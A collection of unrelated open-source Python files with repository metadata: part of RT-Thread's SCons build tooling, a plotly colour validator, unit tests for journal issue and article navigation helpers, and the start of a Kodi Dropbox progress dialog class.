# make an absolute root directory
RTT_ROOT = Rtt_Root
Export('RTT_ROOT')
# set RTT_ROOT in ENV
Env['RTT_ROOT'] = Rtt_Root
# set BSP_ROOT in ENV
Env['BSP_ROOT'] = Dir('#').abspath
sys.path = sys.path + [os.path.join(Rtt_Root, 'tools')]
# {target_name:(CROSS_TOOL, PLATFORM)}
tgt_dict = {'mdk':('keil', 'armcc'),
'mdk4':('keil', 'armcc'),
'mdk5':('keil', 'armcc'),
'iar':('iar', 'iar'),
'vs':('msvc', 'cl'),
'vs2012':('msvc', 'cl'),
'vsc' : ('gcc', 'gcc'),
'cb':('keil', 'armcc'),
'ua':('gcc', 'gcc'),
'cdk':('gcc', 'gcc'),
'makefile':('gcc', 'gcc'),
'eclipse':('gcc', 'gcc'),
'ses' : ('gcc', 'gcc')}
tgt_name = GetOption('target')
if tgt_name:
# --target will change the toolchain settings which clang-analyzer is
# depend on
if GetOption('clang-analyzer'):
print ('--clang-analyzer cannot be used with --target')
sys.exit(1)
SetOption('no_exec', 1)
try:
rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
# replace the 'RTT_CC' to 'CROSS_TOOL'
os.environ['RTT_CC'] = rtconfig.CROSS_TOOL
utils.ReloadModule(rtconfig)
except KeyError:
print ('Unknow target: '+ tgt_name+'. Avaible targets: ' +', '.join(tgt_dict.keys()))
sys.exit(1)
elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
and rtconfig.PLATFORM == 'gcc':
AddDepend('RT_USING_MINILIBC')
# auto change the 'RTT_EXEC_PATH' when 'rtconfig.EXEC_PATH' get failed
if not os.path.exists(rtconfig.EXEC_PATH):
if 'RTT_EXEC_PATH' in os.environ:
# del the 'RTT_EXEC_PATH' and using the 'EXEC_PATH' setting on rtconfig.py
del os.environ['RTT_EXEC_PATH']
utils.ReloadModule(rtconfig)
# add compability with Keil MDK 4.6 which changes the directory of armcc.exe
if rtconfig.PLATFORM == 'armcc' or rtconfig.PLATFORM == 'armclang':
if rtconfig.PLATFORM == 'armcc' and not os.path.isfile(os.path.join(rtconfig.EXEC_PATH, 'armcc.exe')):
if rtconfig.EXEC_PATH.find('bin40') > 0:
rtconfig.EXEC_PATH = rtconfig.EXEC_PATH.replace('bin40', 'armcc/bin')
Env['LINKFLAGS'] = Env['LINKFLAGS'].replace('RV31', 'armcc')
# reset AR command flags
env['ARCOM'] = '$AR --create $TARGET $SOURCES'
env['LIBPREFIX'] = ''
env['LIBSUFFIX'] = '.lib'
env['LIBLINKPREFIX'] = ''
env['LIBLINKSUFFIX'] = '.lib'
env['LIBDIRPREFIX'] = '--userlibpath '
elif rtconfig.PLATFORM == 'iar':
env['LIBPREFIX'] = ''
env['LIBSUFFIX'] = '.a'
env['LIBLINKPREFIX'] = ''
env['LIBLINKSUFFIX'] = '.a'
env['LIBDIRPREFIX'] = '--search '
# patch for win32 spawn
if env['PLATFORM'] == 'win32':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
if env['PLATFORM'] == 'win32':
os.environ['PATH'] = rtconfig.EXEC_PATH + ";" + os.environ['PATH']
else:
os.environ['PATH'] = rtconfig.EXEC_PATH + ":" + os.environ['PATH']
# add program path
env.PrependENVPath('PATH', os.environ['PATH'])
# add rtconfig.h/BSP path into Kernel group
DefineGroup("Kernel", [], [], CPPPATH=[str(Dir('#').abspath)])
# add library build action
act = SCons.Action.Action(BuildLibInstallAction, 'Install compiled library... $TARGET')
bld = Builder(action = act)
Env.Append(BUILDERS = {'BuildLib': bld})
# parse rtconfig.h to get used component
PreProcessor = PatchedPreProcessor()
f = open('rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
if GetOption('clang-analyzer'):
# perform what scan-build does
env.Replace(
CC = 'ccc-analyzer',
CXX = 'c++-analyzer',
# skip as and link
LINK = 'true',
AS = 'true',)
env["ENV"].update(x for x in os.environ.items() if x[0].startswith("CCC_"))
# only check, don't compile. ccc-analyzer use CCC_CC as the CC.
# fsyntax-only will give us some additional warning messages
env['ENV']['CCC_CC'] = 'clang'
env.Append(CFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
env['ENV']['CCC_CXX'] = 'clang++'
env.Append(CXXFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
# remove the POST_ACTION as it will cause meaningless errors(file not
# found or something like that).
rtconfig.POST_ACTION = ''
# generate cconfig.h file
GenCconfigFile(env, BuildOptions)
# auto append '_REENT_SMALL' when using newlib 'nano.specs' option
if rtconfig.PLATFORM == 'gcc' and str(env['LINKFLAGS']).find('nano.specs') != -1:
env.AppendUnique(CPPDEFINES = ['_REENT_SMALL'])
if GetOption('genconfig'):
from genconf import genconfig
genconfig()
exit(0)
if env['PLATFORM'] != 'win32':
AddOption('--menuconfig',
dest = 'menuconfig',
action = 'store_true',
default = False,
help = 'make menuconfig for RT-Thread BSP')
if GetOption('menuconfig'):
from menuconfig import menuconfig
menuconfig(Rtt_Root)
exit(0)
AddOption('--pyconfig',
dest = 'pyconfig',
action = 'store_true',
default = False,
help = 'Python GUI menuconfig for RT-Thread BSP')
AddOption('--pyconfig-silent',
dest = 'pyconfig_silent',
action = 'store_true',
default = False,
help = 'Don`t show pyconfig window')
if GetOption('pyconfig_silent'):
from menuconfig import guiconfig_silent
guiconfig_silent(Rtt_Root)
exit(0)
elif GetOption('pyconfig'):
from menuconfig import guiconfig
guiconfig(Rtt_Root)
exit(0)
configfn = GetOption('useconfig')
if configfn:
from menuconfig import mk_rtconfig
mk_rtconfig(configfn)
exit(0)
if not GetOption('verbose'):
# override the default verbose command string
env.Replace(
ARCOMSTR = 'AR $TARGET',
ASCOMSTR = 'AS $TARGET',
ASPPCOMSTR = 'AS $TARGET',
CCCOMSTR = 'CC $TARGET',
CXXCOMSTR = 'CXX $TARGET',
LINKCOMSTR = 'LINK $TARGET'
)
# fix the linker for C++
if GetDepend('RT_USING_CPLUSPLUS'):
if env['LINK'].find('gcc') != -1:
env['LINK'] = env['LINK'].replace('gcc', 'g++')
# we need to seperate the variant_dir for BSPs and the kernels. BSPs could
# have their own components etc. If they point to the same folder, SCons
# would find the wrong source code to compile.
bsp_vdir = 'build'
kernel_vdir = 'build/kernel'
# board build script
objs = SConscript('SConscript', variant_dir=bsp_vdir, duplicate=0)
# include kernel
objs.extend(SConscript(Rtt_Root + '/src/SConscript', variant_dir=kernel_vdir + '/src', duplicate=0))
# include libcpu
if not has_libcpu:
objs.extend(SConscript(Rtt_Root + '/libcpu/SConscript',
variant_dir=kernel_vdir + '/libcpu', duplicate=0))
# include components
objs.extend(SConscript(Rtt_Root + '/components/SConscript',
variant_dir=kernel_vdir + '/components',
duplicate=0,
exports='remove_components'))
return objs
def PrepareModuleBuilding(env, root_directory, bsp_directory):
import rtconfig
global BuildOptions
global Env
global Rtt_Root
# patch for win32 spawn
if env['PLATFORM'] == 'win32':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
Env = env
Rtt_Root = root_directory
# parse bsp rtconfig.h to get used component
PreProcessor = PatchedPreProcessor()
f = open(bsp_directory + '/rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
# add build/clean library option for library checking
AddOption('--buildlib',
dest='buildlib',
type='string',
help='building library of a component')
AddOption('--cleanlib',
dest='cleanlib',
action='store_true',
default=False,
help='clean up the library by --buildlib')
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetConfigValue(name):
assert type(name) == str, 'GetConfigValue: only string parameter is valid'
try:
return BuildOptions[name]
except:
return ''
def GetDepend(depend):
building = True
if type(depend) == type('str'):
if not depend in BuildOptions or BuildOptions[depend] == 0:
building = False
elif BuildOptions[depend] != '':
return BuildOptions[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not item in BuildOptions or BuildOptions[item] == 0:
building = False
return building
def LocalOptions(config_filename):
from SCons.Script import SCons
# parse wiced_config.h to get used component
PreProcessor = SCons.cpp.PreProcessor()
f = open(config_filename, 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
local_options = PreProcessor.cpp_namespace
return local_options
def GetLocalDepend(options, depend):
building = True
if type(depend) == type('str'):
if not depend in options or options[depend] == 0:
building = False
elif options[depend] != '':
return options[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not item in options or options[item] == 0:
building = False
return building
def AddDepend(option):
BuildOptions[option] = 1
def MergeGroup(src_group, group):
src_group['src'] = src_group['src'] + group['src']
if 'CCFLAGS' in group:
if 'CCFLAGS' in src_group:
src_group['CCFLAGS'] = src_group['CCFLAGS'] + group['CCFLAGS']
else:
src_group['CCFLAGS'] = group['CCFLAGS']
if 'CPPPATH' in group:
if 'CPPPATH' in src_group:
src_group['CPPPATH'] = src_group['CPPPATH'] + group['CPPPATH']
else:
src_group['CPPPATH'] = group['CPPPATH']
if 'CPPDEFINES' in group:
if 'CPPDEFINES' in src_group:
src_group['CPPDEFINES'] = src_group['CPPDEFINES'] + group['CPPDEFINES']
else:
src_group['CPPDEFINES'] = group['CPPDEFINES']
if 'ASFLAGS' in group:
if 'ASFLAGS' in src_group:
src_group['ASFLAGS'] = src_group['ASFLAGS'] + group['ASFLAGS']
else:
src_group['ASFLAGS'] = group['ASFLAGS']
# for local CCFLAGS/CPPPATH/CPPDEFINES
if 'LOCAL_CCFLAGS' in group:
if 'LOCAL_CCFLAGS' in src_group:
src_group['LOCAL_CCFLAGS'] = src_group['LOCAL_CCFLAGS'] + group['LOCAL_CCFLAGS']
else:
src_group['LOCAL_CCFLAGS'] = group['LOCAL_CCFLAGS']
if 'LOCAL_CPPPATH' in group:
if 'LOCAL_CPPPATH' in src_group:
src_group['LOCAL_CPPPATH'] = src_group['LOCAL_CPPPATH'] + group['LOCAL_CPPPATH']
else:
src_group['LOCAL_CPPPATH'] = group['LOCAL_CPPPATH']
if 'LOCAL_CPPDEFINES' in group:
if 'LOCAL_CPPDEFINES' in src_group:
src_group['LOCAL_CPPDEFINES'] = src_group['LOCAL_CPPDEFINES'] + group['LOCAL_CPPDEFINES']
else:
src_group['LOCAL_CPPDEFINES'] = group['LOCAL_CPPDEFINES']
if 'LINKFLAGS' in group:
if 'LINKFLAGS' in src_group:
src_group['LINKFLAGS'] = src_group['LINKFLAGS'] + group['LINKFLAGS']
else:
src_group['LINKFLAGS'] = group['LINKFLAGS']
if 'LIBS' in group:
if 'LIBS' in src_group:
src_group['LIBS'] = src_group['LIBS'] + group['LIBS']
else:
src_group['LIBS'] = group['LIBS']
if 'LIBPATH' in group:
if 'LIBPATH' in src_group:
src_group['LIBPATH'] = src_group['LIBPATH'] + group['LIBPATH']
else:
src_group['LIBPATH'] = group['LIBPATH']
if 'LOCAL_ASFLAGS' in group:
if 'LOCAL_ASFLAGS' in src_group:
src_group['LOCAL_ASFLAGS'] = src_group['LOCAL_ASFLAGS'] + group['LOCAL_ASFLAGS']
else:
src_group['LOCAL_ASFLAGS'] = group['LOCAL_ASFLAGS']
def DefineGroup(name, src, depend, **parameters):
global Env
if not GetDepend(depend):
return []
# find exist group and get path of group
group_path = ''
for g in Projects:
if g['name'] == name:
group_path = g['path']
if group_path == '':
group_path = GetCurrentDir()
group = parameters
group['name'] = name
group['path'] = group_path
if type(src) == type([]):
group['src'] = File(src)
else:
group['src'] = src
if 'CCFLAGS' in group:
Env.AppendUnique(CCFLAGS = group['CCFLAGS'])
if 'CPPPATH' in group:
paths = []
for item in group['CPPPATH']:
paths.append(os.path.abspath(item))
group['CPPPATH'] = paths
Env.AppendUnique(CPPPATH = group['CPPPATH'])
if 'CPPDEFINES' in group:
Env.AppendUnique(CPPDEFINES = group['CPPDEFINES'])
if 'LINKFLAGS' in group:
Env.AppendUnique(LINKFLAGS = group['LINKFLAGS'])
if 'ASFLAGS' in group:
Env.AppendUnique(ASFLAGS = group['ASFLAGS'])
if 'LOCAL_CPPPATH' in group:
paths = []
for item in group['LOCAL_CPPPATH']:
paths.append(os.path.abspath(item))
group['LOCAL_CPPPATH'] = paths
import rtconfig
if rtconfig.PLATFORM == 'gcc':
if 'CCFLAGS' in group:
group['CCFLAGS'] = utils.GCCC99Patch(group['CCFLAGS'])
if 'LOCAL_CCFLAGS' in group:
group['LOCAL_CCFLAGS'] = utils.GCCC99Patch(group['LOCAL_CCFLAGS'])
# check whether to clean up library
if GetOption('cleanlib') and os.path.exists(os.path.join(group['path'], GroupLibFullName(name, Env))):
if group['src'] != []:
print ('Remove library:'+ GroupLibFullName(name, Env))
fn = os.path.join(group['path'], GroupLibFullName(name, Env))
if os.path.exists(fn):
os.unlink(fn)
if 'LIBS' in group:
Env.AppendUnique(LIBS = group['LIBS'])
if 'LIBPATH' in group:
Env.AppendUnique(LIBPATH = group['LIBPATH'])
# check whether to build group library
if 'LIBRARY' in group:
objs = Env.Library(name, group['src'])
else:
# only add source
objs = group['src']
# merge group
for g in Projects:
if g['name'] == name:
# merge to this group
MergeGroup(g, group)
return objs
# add a new group
Projects.append(group)
return objs
def GetCurrentDir():
conscript = File('SConscript')
fn = conscript.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
return path
PREBUILDING = []
def RegisterPreBuildingAction(act):
global PREBUILDING
assert callable(act), 'Could only register callable objects. %s received' % repr(act)
PREBUILDING.append(act)
def PreBuilding():
global PREBUILDING
for a in PREBUILDING:
a()
def GroupLibName(name, env):
import rtconfig
if rtconfig.PLATFORM == 'armcc':
return name + '_rvds'
elif rtconfig.PLATFORM == 'gcc':
return name + '_gcc'
return name
def GroupLibFullName(name, env):
return env['LIBPREFIX'] + GroupLibName(name, env) + env['LIBSUFFIX']
def BuildLibInstallAction(target, source, env):
lib_name = GetOption('buildlib')
for Group in Projects:
if Group['name'] == lib_name:
lib_name = GroupLibFullName(Group['name'], env)
dst_name = os.path.join(Group['path'], lib_name)
print ('Copy '+lib_name+' => ' +dst_name)
do_copy_file(lib_name, dst_name)
break
def DoBuilding(target, objects):
# merge all objects into one list
def one_list(l):
lst = []
for item in l:
if type(item) == type([]):
lst += one_list(item)
else:
lst.append(item)
return lst
# handle local group
def local_group(group, objects):
if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group or 'LOCAL_ASFLAGS' in group:
CCFLAGS = Env.get('CCFLAGS', '') + group.get('LOCAL_CCFLAGS', '')
CPPPATH = Env.get('CPPPATH', ['']) + group.get('LOCAL_CPPPATH', [''])
CPPDEFINES = Env.get('CPPDEFINES', ['']) + group.get('LOCAL_CPPDEFINES', [''])
ASFLAGS = Env.get('ASFLAGS', '') + group.get('LOCAL_ASFLAGS', '')
for source in group['src']:
objects.append(Env.Object(source, CCFLAGS = CCFLAGS, ASFLAGS = ASFLAGS,
CPPPATH = CPPPATH, CPPDEFINES = CPPDEFINES))
return True
return False
objects = one_list(objects)
program = None
# check whether special buildlib option
lib_name = GetOption('buildlib')
if lib_name:
objects = [] # remove all of objects
# build library with special component
for Group in Projects:
if Group['name'] == lib_name:
lib_name = GroupLibName(Group['name'], Env)
if not local_group(Group, objects):
objects = Env.Object(Group['src'])
program = Env.Library(lib_name, objects)
# add library copy action
Env.BuildLib(lib_name, program)
break
else:
# remove source files with local flags setting
for group in Projects:
if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group:
for source in group['src']:
for obj in objects:
if source.abspath == obj.abspath or (len(obj.sources) > 0 and source.abspath == obj.sources[0].abspath):
objects.remove(obj)
# re-add the source files to the objects
for group in Projects:
local_group(group, objects)
program = Env.Program(target, objects)
EndBuilding(target, program)
def GenTargetProject(program = None):
if GetOption('target') == 'mdk':
from keil import MDKProject
from keil import MDK4Project
from keil import MDK5Project
template = os.path.isfile('template.Uv2')
if template:
MDKProject('project.Uv2', Projects)
else:
template = os.path.isfile('template.uvproj')
if template:
MDK4Project('project.uvproj', Projects)
else:
template = os.path.isfile('template.uvprojx')
if template:
MDK5Project('project.uvprojx', Projects)
else:
print ('No template project file found.')
if GetOption('target') == 'mdk4':
from keil import MDK4Project
MDK4Project('project.uvproj', Projects)
if GetOption('target') == 'mdk5':
from keil import MDK5Project
MDK5Project('project.uvprojx', Projects)
if GetOption('target') == 'iar':
from iar import IARProject
IARProject('project.ewp', Projects)
if GetOption('target') == 'vs':
from vs import VSProject
VSProject('project.vcproj', Projects, program)
if GetOption('target') == 'vs2012':
from vs2012 import VS2012Project
VS2012Project('project.vcxproj', Projects, program)
if GetOption('target') == 'cb':
from codeblocks import CBProject
CBProject('project.cbp', Projects, program)
if GetOption('target') == 'ua':
from ua import PrepareUA
PrepareUA(Projects, Rtt_Root, str(Dir('#')))
if GetOption('target') == 'vsc':
from vsc import GenerateVSCode
GenerateVSCode(Env)
if GetOption('target') == 'cdk':
from cdk import CDKProject
CDKProject('project.cdkproj', Projects)
if GetOption('target') == 'ses':
from ses import SESProject
SESProject(Env)
if GetOption('target') == 'makefile':
from makefile import TargetMakefile
TargetMakefile(Env)
if GetOption('target') == 'eclipse':
from eclipse import TargetEclipse
TargetEclipse(Env, GetOption('reset-project-config'), GetOption('project-name'))
def EndBuilding(target, program = None):
import rtconfig
need_exit = False
Env['target'] = program
Env['project'] = Projects
if hasattr(rtconfig, 'BSP_LIBRARY_TYPE'):
Env['bsp_lib_type'] = rtconfig.BSP_LIBRARY_TYPE
if hasattr(rtconfig, 'dist_handle'):
Env['dist_handle'] = rtconfig.dist_handle
Env.AddPostAction(target, rtconfig.POST_ACTION)
# Add addition clean files
Clean(target, 'cconfig.h')
Clean(target, 'rtua.py')
Clean(target, 'rtua.pyc')
if GetOption('target'):
GenTargetProject(program)
BSP_ROOT = Dir('#').abspath
if GetOption('make-dist') and program != None:
from mkdist import MkDist
MkDist(program, BSP_ROOT, Rtt_Root, Env)
if GetOption('make-dist-strip') and program != None:
from mkdist import MkDist_Strip
MkDist_Strip(program, BSP_ROOT, Rtt_Root, Env)
need_exit = True
if GetOption('make-dist-ide') and program != None:
from mkdist import MkDist
project_path = GetOption('project-path')
project_name = GetOption('project-name')
if not isinstance(project_path, str) or len(project_path) == 0 :
print("\nwarning : --project-path=your_project_path parameter is required.")
print("\nstop!")
exit(0)
if not isinstance(project_name, str) or len(project_name) == 0:
print("\nwarning : --project-name=your_project_name parameter is required.")
print("\nstop!")
exit(0)
rtt_ide = {'project_path' : project_path, 'project_name' : project_name}
MkDist(program, BSP_ROOT, Rtt_Root, Env, rtt_ide)
need_exit = True
if GetOption('cscope'):
from cscope import CscopeDatabase
CscopeDatabase(Projects)
if not GetOption('help') and not GetOption('target'):
if not os.path.exists(rtconfig.EXEC_PATH):
print ("Error: the toolchain path (" + rtconfig.EXEC_PATH + ") is not exist, please check 'EXEC_PATH' in path or rtconfig.py.")
need_exit = True
if need_exit:
exit(0)
def SrcRemove(src, remove):
if not src:
return
src_bak = src[:]
if type(remove) == type('str'):
if os.path.isabs(remove):
remove = os.path.relpath(remove, GetCurrentDir())
remove = os.path.normpath(remove)
for item in src_bak:
if type(item) == type('str'):
item_str = item
else:
item_str = item.rstr()
if os.path.isabs(item_str):
item_str = os.path.relpath(item_str, GetCurrentDir())
item_str = os.path.normpath(item_str)
if item_str == remove:
src.remove(item)
else:
for remove_item in remove:
remove_str = str(remove_item)
if os.path.isabs(remove_str):
remove_str = os.path.relpath(remove_str, GetCurrentDir())
remove_str = os.path.normpath(remove_str)
for item in src_bak:
if type(item) == type('str'):
item_str = item
else:
item_str = item.rstr()
if os.path.isabs(item_str):
item_str = os.path.relpath(item_str, GetCurrentDir())
item_str = os.path.normpath(item_str)
if item_str == remove_str:
src.remove(item)
def GetVersion():
import SCons.cpp
import string
rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')
# parse rtdef.h to get RT-Thread version
prepcessor = PatchedPreProcessor()
f = open(rtdef, 'r')
contents = f.read()
f.close()
prepcessor.process_contents(contents)
def_ns = prepcessor.cpp_namespace
version = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_VERSION']))
subversion = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_SUBVERSION']))
if 'RT_REVISION' in def_ns:
revision = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_REVISION']))
return '%d.%d.%d' % (version, subversion, revision)
return '0.%d.%d' % (version, subversion)
def GlobSubDir(sub_dir, ext_name):
import os
import glob
def glob_source(sub_dir, ext_name):
list = os.listdir(sub_dir)
src = glob.glob(os.path.join(sub_dir, ext_name))
for item in list:
full_subdir = os.path.join(sub_dir, item)
if os.path.isdir(full_subdir):
src += glob_source(full_subdir, ext_name)
return src
dst = []
src = glob_source(sub_dir, ext_name)
for item in src:
dst.append(os.path.relpath(item, sub_dir))
return dst
def PackageSConscript(package):
from package import BuildPackage
return BuildPackage(package)
| {
"content_hash": "f056592e638612d63653b53ccad72da7",
"timestamp": "",
"source": "github",
"line_count": 982,
"max_line_length": 139,
"avg_line_length": 33.95723014256619,
"alnum_prop": 0.5618365021291909,
"repo_name": "weiyuliang/rt-thread",
"id": "65af7944345fb7ce1ac63dbc260d7b152c33c536",
"size": "34428",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/building.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "10845457"
},
{
"name": "Batchfile",
"bytes": "187090"
},
{
"name": "C",
"bytes": "585304292"
},
{
"name": "C++",
"bytes": "8035069"
},
{
"name": "CMake",
"bytes": "148026"
},
{
"name": "CSS",
"bytes": "9978"
},
{
"name": "DIGITAL Command Language",
"bytes": "13234"
},
{
"name": "GDB",
"bytes": "11796"
},
{
"name": "HTML",
"bytes": "1646865"
},
{
"name": "Lex",
"bytes": "7026"
},
{
"name": "Logos",
"bytes": "7078"
},
{
"name": "M4",
"bytes": "17515"
},
{
"name": "Makefile",
"bytes": "271627"
},
{
"name": "Module Management System",
"bytes": "1548"
},
{
"name": "Objective-C",
"bytes": "4109718"
},
{
"name": "Pawn",
"bytes": "2854"
},
{
"name": "Perl",
"bytes": "9520"
},
{
"name": "PowerShell",
"bytes": "1628"
},
{
"name": "Python",
"bytes": "1553852"
},
{
"name": "RPC",
"bytes": "14162"
},
{
"name": "Rich Text Format",
"bytes": "177701"
},
{
"name": "Roff",
"bytes": "4486"
},
{
"name": "Ruby",
"bytes": "869"
},
{
"name": "Shell",
"bytes": "407900"
},
{
"name": "TeX",
"bytes": "3113"
},
{
"name": "Yacc",
"bytes": "16084"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(self, plotly_name="color", parent_name="volume.contour", **kwargs):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
| {
"content_hash": "98ec4867c2ea600fed991e534ad31e4e",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 84,
"avg_line_length": 36.833333333333336,
"alnum_prop": 0.6063348416289592,
"repo_name": "plotly/python-api",
"id": "96ede4f0c426915490b176fc32b5034805f6a9b0",
"size": "442",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/volume/contour/_color.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
from .base import BaseTestCase
from . import utils
from webapp import utils as wutils
class UtilsTestCase(BaseTestCase):
# Issue
def test_get_prev_issue(self):
"""
Teste da função utils.get_prev_issue().
IMPORTANTE: A lista é invertida.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '2', 'order': '2', })
issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '3', 'order': '3', })
# criando uma lista de números ordenada
issues = [issue1, issue2, issue3]
prev_issue = wutils.get_prev_issue(issues, issue2)
self.assertEqual(prev_issue, issue3)
def test_get_next_issue(self):
"""
Teste da função utils.get_next_issue().
IMPORTANTE: A lista é invertida.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '2', 'order': '2', })
issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '3', 'order': '3', })
# criando uma lista de números ordenada
issues = [issue1, issue2, issue3]
next_issue = wutils.get_next_issue(issues, issue2)
self.assertEqual(next_issue, issue1)
def test_get_prev_issue_with_one_item(self):
"""
Teste da função utils.get_prev_issue() without itens, deve retorna None.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue = utils.makeOneIssue()
# criando uma lista de números vazia
issues = [issue1]
prev_issue = wutils.get_prev_issue(issues, issue)
self.assertIsNone(prev_issue)
def test_get_next_issue_with_one_item(self):
"""
Teste da função utils.get_next_issue() without itens, deve retorna None.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue = utils.makeOneIssue()
# criando uma lista de números vazia
issues = [issue1]
next_issue = wutils.get_next_issue(issues, issue)
self.assertIsNone(next_issue)
def test_get_prev_issue_when_the_last_issue(self):
"""
Testando o get_prev_issue quando é acessado um índice inexistente, deve
retorna None.
Acessando o a um índice inexistente, o último item da lista irá retornar
None pois não existe o índice [último] + 1 (Lembrando que a lista de
número é invertida)
Portanto a função get_prev_issue soma 1.
IMPORTANTE: A lista é invertida.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '2', 'order': '2', })
issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '3', 'order': '3', })
issue4 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '4', 'order': '4', })
# criando uma lista de números ordenada
issues = [issue1, issue2, issue3, issue4]
prev_issue = wutils.get_prev_issue(issues, issue4)
self.assertIsNone(prev_issue)
def test_get_next_issue_when_first_item(self):
"""
Testando o get_next_issue quando é acessado o primiero índice, deve
retorna None.
Acessando o primiero item da lista irá retornar None.
IMPORTANTE: A lista é invertida.
"""
issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '1', 'order': '1', })
issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '2', 'order': '2', })
issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '3', 'order': '3', })
issue4 = utils.makeOneIssue({'year': '2016', 'volume': '1',
'number': '4', 'order': '4', })
# criando uma lista de números ordenada
issues = [issue1, issue2, issue3, issue4]
next_issue = wutils.get_next_issue(issues, issue1)
self.assertIsNone(next_issue)
# Article
def test_get_prev_article(self):
"""
Teste da função utils.get_prev_article().
"""
article1 = utils.makeOneArticle({'order': '1', })
article2 = utils.makeOneArticle({'order': '2', })
article3 = utils.makeOneArticle({'order': '3', })
# criando uma lista de artigos ordenada
articles = [article1, article2, article3]
prev_article = wutils.get_prev_article(articles, article2)
self.assertEqual(prev_article, article1)
def test_get_next_article(self):
"""
Teste da função utils.get_next_article().
"""
article1 = utils.makeOneArticle({'order': '1', })
article2 = utils.makeOneArticle({'order': '2', })
article3 = utils.makeOneArticle({'order': '3', })
# criando uma lista de artigos ordenada
articles = [article1, article2, article3]
next_article = wutils.get_next_article(articles, article2)
self.assertEqual(next_article, article3)
def test_get_next_article_when_last_article(self):
"""
Teste da função utils.get_next_article(), quando é o último artigo
deve retorna None.
"""
article1 = utils.makeOneArticle({'order': '1', })
article2 = utils.makeOneArticle({'order': '2', })
article3 = utils.makeOneArticle({'order': '3', })
# criando uma lista de artigos ordenada
articles = [article1, article2, article3]
next_article = wutils.get_next_article(articles, article3)
self.assertIsNone(next_article)
def test_get_prev_article_when_first_article(self):
"""
Teste da função utils.get_prev_article(), quando é o primeiro artigo
deve retorna None.
"""
article1 = utils.makeOneArticle({'order': '1', })
article2 = utils.makeOneArticle({'order': '2', })
article3 = utils.makeOneArticle({'order': '3', })
# criando uma lista de artigos ordenada
articles = [article1, article2, article3]
prev_article = wutils.get_prev_article(articles, article1)
self.assertIsNone(prev_article)
| {
"content_hash": "a1d44d1cf9ddef5a4c7f941730a24c5b",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 80,
"avg_line_length": 33.875,
"alnum_prop": 0.536474595515186,
"repo_name": "jfunez/opac",
"id": "9d94171cc3aeede00f166217d39fe6006ec4cb64",
"size": "7107",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "opac/tests/test_utils.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "127482"
},
{
"name": "Dockerfile",
"bytes": "1309"
},
{
"name": "HTML",
"bytes": "184104"
},
{
"name": "JavaScript",
"bytes": "848239"
},
{
"name": "Makefile",
"bytes": "7143"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "565866"
}
],
"symlink_target": ""
} |
#
import xbmcplugin
import xbmcgui
import time
from resources.lib.utils import *
class DropboxBackgroundProgress(xbmcgui.WindowXMLDialog):
"""
Dialog class that shows the progress of a Dropbox background task.
Using the DialogExtendedProgressBar.xml
"""
#DialogExtendedProgressBar IDs
HEADING_LABEL = 30
LINE1_LABEL = 31
